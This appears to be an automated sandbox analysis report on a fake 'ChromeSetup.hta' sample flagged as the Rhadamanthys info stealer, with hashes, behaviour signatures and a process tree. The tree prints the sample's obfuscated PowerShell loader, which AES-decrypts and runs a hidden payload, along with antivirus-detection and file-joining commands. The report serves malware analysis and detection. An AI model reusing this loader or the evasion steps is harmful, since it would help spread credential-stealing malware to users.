Analysis
-
max time kernel
1191s -
max time network
1149s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-03-2024 03:03
Static task
static1
Behavioral task
behavioral1
Sample
ChromeSetup.hta
Resource
win10-20240221-en
Behavioral task
behavioral2
Sample
ChromeSetup.hta
Resource
win10v2004-20240319-en
Behavioral task
behavioral3
Sample
ChromeSetup.hta
Resource
win11-20240221-en
General
-
Target
ChromeSetup.hta
-
Size
140KB
-
MD5
d92c49ca712a0503de3e182f66e3dcba
-
SHA1
97f716142447128859561a75e4677f978aca7fad
-
SHA256
908ca27ec447937b2f97fd4053a8fea99f45bc7e2eb028152f2301c97f952acf
-
SHA512
fdc26a2aa4f935286f77d04538bef4e7d0a3f99fec2a85544b5ab086ba1ab0fa758332f4aea26ea5f7e57f4bdb30854d64fd760e38d2bc2b31b414a97392b4e1
-
SSDEEP
768:p+/unhi1zOzZ+/unhi1zOzpBG3uJ1zxTg+/unhi1zOzxM+/unhi1zOz:pti5OzZti5OzpB91tgti5Ozati5Oz
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
Donations.pifdescription pid Process procid_target PID 1064 created 2572 1064 Donations.pif 43 -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 2 1572 powershell.exe 3 1572 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
ChromeSetup.exeDonations.pifpid Process 4220 ChromeSetup.exe 1064 Donations.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 1860 1064 WerFault.exe 101 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid Process 4136 tasklist.exe 1716 tasklist.exe -
Processes:
AcroRd32.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
powershell.exeDonations.pifAcroRd32.exedialer.exepid Process 1572 powershell.exe 1572 powershell.exe 1064 Donations.pif 1064 Donations.pif 1064 Donations.pif 1064 Donations.pif 1064 Donations.pif 1064 Donations.pif 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 1064 Donations.pif 1064 Donations.pif 2804 dialer.exe 2804 dialer.exe 2804 dialer.exe 2804 dialer.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetasklist.exetasklist.exedescription pid Process Token: SeDebugPrivilege 1572 powershell.exe Token: SeDebugPrivilege 4136 tasklist.exe Token: SeDebugPrivilege 1716 tasklist.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
AcroRd32.exeDonations.pifpid Process 3284 AcroRd32.exe 1064 Donations.pif 1064 Donations.pif 1064 Donations.pif -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Donations.pifpid Process 1064 Donations.pif 1064 Donations.pif 1064 Donations.pif -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
AcroRd32.exepid Process 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe 3284 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
mshta.exepowershell.exeAcroRd32.exeChromeSetup.exeRdrCEF.exedescription pid Process procid_target PID 640 wrote to memory of 1572 640 mshta.exe 80 PID 640 wrote to memory of 1572 640 mshta.exe 80 PID 640 wrote to memory of 1572 640 mshta.exe 80 PID 1572 wrote to memory of 3284 1572 powershell.exe 82 PID 1572 wrote to memory of 3284 1572 powershell.exe 82 PID 1572 wrote to memory of 3284 1572 powershell.exe 82 PID 1572 wrote to memory of 4220 1572 powershell.exe 83 PID 1572 wrote to memory of 4220 1572 powershell.exe 83 PID 1572 wrote to memory of 4220 1572 powershell.exe 83 PID 3284 wrote to memory of 2636 3284 AcroRd32.exe 84 PID 3284 wrote to memory of 2636 3284 AcroRd32.exe 84 PID 3284 wrote to memory of 2636 3284 AcroRd32.exe 84 PID 4220 wrote to memory of 3948 4220 ChromeSetup.exe 85 PID 4220 wrote to memory of 3948 4220 ChromeSetup.exe 85 PID 4220 wrote to memory of 3948 4220 ChromeSetup.exe 85 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 3416 2636 RdrCEF.exe 87 PID 2636 wrote to memory of 1872 2636 RdrCEF.exe 88 PID 2636 wrote to memory of 1872 2636 RdrCEF.exe 88 PID 2636 wrote to memory of 1872 2636 RdrCEF.exe 88 PID 2636 wrote to memory of 1872 2636 RdrCEF.exe 88 PID 2636 wrote to memory of 1872 2636 RdrCEF.exe 88 PID 2636 wrote to memory of 1872 2636 RdrCEF.exe 88
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2572
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2804
-
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ChromeSetup.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TLcToxJS($Imjw){return -split ($Imjw -replace '..', '0x$& ')};$eGLbfA = TLcToxJS('88713C0E6345BF6F01234702EC33828DDF2378F0EB28C8C270C3C536F77F2A54D7C551CF332C7EFBAF6008BFF77DA8394D3473142E76214843C7E2728213CE6C97DE8B20BE13ABE17961072C4BEB4AF63EE7E46FC28FAF8FBAB114708D65DA81E5E0ED6AF7D726C17278A48BEC42EC6BBE58DF4595E510DF26A125762D63550A3000230E2088A014B6E1C6C14C2820693207376F17572345B88EC7F724E177A87B0213D1AC159F23E2B4B8D62637C9C52EE0C61AF3F759CE95D4CCFDDF0A2920F9BE9528C53A00FA3E5E072D939A82148E1776937E0D3EE2417D96EB758AB281FBA019DD2FA30AC300F00A6F4948DFD2D169927C6877A7588F5C44E400419BD6307661915A781BDB5C8206A73196CDE95289A3349017F0A372F159A386104D96295F3F438637717852645E0A13E68B91D1C9DCC32199E06F03D3F18182C07AE06CFD02653A671F7F90E597264B1AB8630350388A281494A22166BCB1E37F99F9EE48E74940CA6C5664AA1C448238D37ABFE7BE981A0A4E70DC3B0DDFC66538A07BC735D13C2A030C1F254D3232CA5BD9E70858BDE03361E3A65FC4F06D462EAF5EC013F2C34DE3ECD079C2FB4A4B03C10C5C2B4EC7B6F86FC6CE2456855E39C9EE5FC9C630D415D23ADED57DD934EDA90E63224A16BF4E09F979802D9AE10954F5BD3B5578A6C00AA970D90E4785E80AEAE49317C95D54C1B08E1CC832B6F70717511068D683A1255FD896F64ABAA25551AD9668C3BF7378E17F68C6EDDBA093F48BE9FCB33545BB8E1D155B3433F5F36CEB9331DED5F64C86B2134F57C4A43C62273B2BE22CF9FFC0738F919E86116A5450C795807EE8877F1DBD799496CCF6739DACB0F81EF980F33800C6F5666CC22C574E394123A5A09FD9C660B1F295B3527FD32F61858CCB3369A181B1532D9BFD6833EB6F6D3F65D514F38472B577FB8C988FD2C8652F8F46F507A7CBA0FD6608864F30653D030DC31D049A5D0563BA61A2EFBAA8BB4825655A24C0CD4E1B9370628A4231400F6458CD6E70274AA26C4C08074C7D9A9D10DEABFF20861561FBBDA361C1140EE331F0467C225AB79BB530FADE7B415F60EA39D9C0943627996F318DF6EED8076C4C5DCB604FF6441C32A0196836C1394C79F28CD6A6EA1116FE9F0E10B6BAF9884B9D8E1AFB0162E467C4AAEE322A536D223430EADE38BC4267B3DEF3F964495B1C40A083D4E0C1F248825C62DCC7995C4870848F86637A32C271D202C5F98CC839D02847FB6857CE5A8E00DDA8B74B66E15115AD1BD6174AB6A160427FFAA1F33FF268D51253FC1C4163F0C7A2F65DC993B3DE547C7A510AF2C2A75A06398041402E9B8A7DEC77D052B922B59A7B608D95DF41CF8C3D9B25062BA3D357C54BF29264105D3F47E285C4667440C9D95C33594DA1D64F157A5C9DF920F92BF4CDABAAEC1C9E63459CDC18164C0D8E7A028941C06483663379FC6E20727DA1799FB7FEC57F45CE3DAE1DE32B38162DA998F7345141B34F6A32CA80860A6AE45D73FDDE1BFFF7A3E35966226200D6FEDB2F5F55A6D15F4E6E10A42EE2AF5EF1AB59D5156FAF3EFE1D267E3562417FB3741FEC879A432B8B25A0C804213FFB17AD28D77B52B3401862CF5D8A79B3815F08361F0690375F1444A5652755241B7B4C76E7B42BC96CBC4AC7DD4DE115175DFCBA5B484D4B254BA0A3C3A24874E3D90347F7EA8DA46AC7B123E8B9');$xBQDa = [System.Security.Cryptography.Aes]::Create();$xBQDa.Key = TLcToxJS('466371524D774563634159445A6A426E');$xBQDa.IV = New-Object byte[] 16;$PuTlXHvG = $xBQDa.CreateDecryptor();$BgiNlDJqW = $PuTlXHvG.TransformFinalBlock($eGLbfA, 0, $eGLbfA.Length);$HxMgCSafi = [System.Text.Encoding]::Utf8.GetString($BgiNlDJqW);$PuTlXHvG.Dispose();& $HxMgCSafi.Substring(0,3) $HxMgCSafi.Substring(3)2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DB0107E573546FF35866715FBD4AE9D8 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DB0107E573546FF35866715FBD4AE9D8 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:15⤵PID:3416
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=ACD5BB1F196BA1375A0045A344C2F924 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1872
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6ECDAD9A79189A7C02C294BDE5FCC11D --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1640
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3243B0154B8B4133AB9767C927801844 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3243B0154B8B4133AB9767C927801844 --renderer-client-id=5 --mojo-platform-channel-handle=2032 --allow-no-sandbox-job /prefetch:15⤵PID:3136
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4AAF0F7B55F13C866EEA7E5F79D193F6 --mojo-platform-channel-handle=2708 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2248
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BEF59DA98A3D6D6DD7E684BF11639301 --mojo-platform-channel-handle=2884 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2432
-
-
-
-
C:\Users\Admin\AppData\Roaming\ChromeSetup.exe"C:\Users\Admin\AppData\Roaming\ChromeSetup.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit4⤵PID:3948
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:8
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵PID:1920
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 131375⤵PID:728
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Compound + Injection + Emotions + Worm + Participants 13137\Donations.pif5⤵PID:1632
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Src + Expressions + Safari + Treasury 13137\x5⤵PID:1248
-
-
C:\Users\Admin\AppData\Local\Temp\13137\Donations.pif13137\Donations.pif 13137\x5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1064 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 9846⤵
- Program crash
PID:1860
-
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.15⤵
- Runs ping.exe
PID:4692
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1064 -ip 10641⤵PID:4792
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD57d45dd300a60276719a772829599cc9d
SHA140357f2295904b3cd23de723d1987598a3236f10
SHA256c6545b375876d3765cbb3ef27a9b63b4cde98372b81f5c3a9045dc0594ae626c
SHA51227ce3964d4044e5e98c5fc55c384e8988fbdb889a453fa6f46deb63e8b2d89def2baf52117db623a5232237d8d66b2e30fb6f02b4a2fe0ca90c841029342723b
-
Filesize
872KB
MD56ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA51257d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0
-
Filesize
870KB
MD5a91c6eadc37c8082fcd0d8fd1762b8fe
SHA173ce49f75160ed5dafb1b8483111f5d383e919c2
SHA2564b47058fa38dcae6c5f596fad0f2dcea2071b59e8d8a7b9e26a8585cf7119b69
SHA5120a5e077e0241941b8d6032dc8920a363a8bddbde52cfef940940da5d0a7244febf22824a290c75741d450ae4dd099bfcba1f20b99dcdbb1e06cfcbf4546460b8
-
Filesize
13KB
MD5b51276964bb7d7ced0ca782c1505d9ca
SHA1961d8f2ed348d6bfe38f109e97ab8b55db14591c
SHA25655cc097b9fcc03fd4c728618889b48973ed7bcf36057edd819ef475f4aca9403
SHA512fd485c564a64fdb53546c5ddee7dbd52fffea81405d81f49d3a7e1081f892f720120448ecb11190623e7e909683170ece6abaea090cdc857b62b17f1a9d2c547
-
Filesize
280KB
MD5d63c5479fd18f86817d489744a338751
SHA182385a52bb5485fab0a3d1e7f9a3661bf35d3098
SHA2563f7aa56dfd875ebf6e3aa86be897f65302f88e4022cf2dc984fdb4ac9cff0037
SHA512da8a157239ef59e683b2ad06492136cfc52550af0947bb812fc7795f02ab0e09cf510b701a9e247b0ec197879028778a0af8daf01589d1a53090aa4f91bf0361
-
Filesize
139KB
MD5569505062321992f4e2803461c40e724
SHA1b62f7987f92b4397b02b6894e759096fdee1f7db
SHA256748a3b063eff70ed5ba8a3a2590f409e5ec79d84d402abae5bb26b42e204e434
SHA5122d23a0322100f570f2298230338c68bd23b683cae2e9a0f27bd5098a6f1c15699d3ba77a319786df34a60739a79f863adb190b6c3aa5fbc06030ae1872cb71fd
-
Filesize
192KB
MD54d2c4c2d10cbe2b966ed315d3b69ec85
SHA179c68a4a84cca7d3d89af86b20b43481c6f3f6f5
SHA25630466932a194dc9893bf6a7a22e658243d79ce9d76bce07ad73522e1be01c335
SHA51280a54f0f580b1d23ee746dc0c9858d98d82a24450a3b8b9ecfd7759796b2cdc4714d586351ec8adc70eb8ee3a21a12aa08dc1b83796f91d1b7535ae030f3b205
-
Filesize
221KB
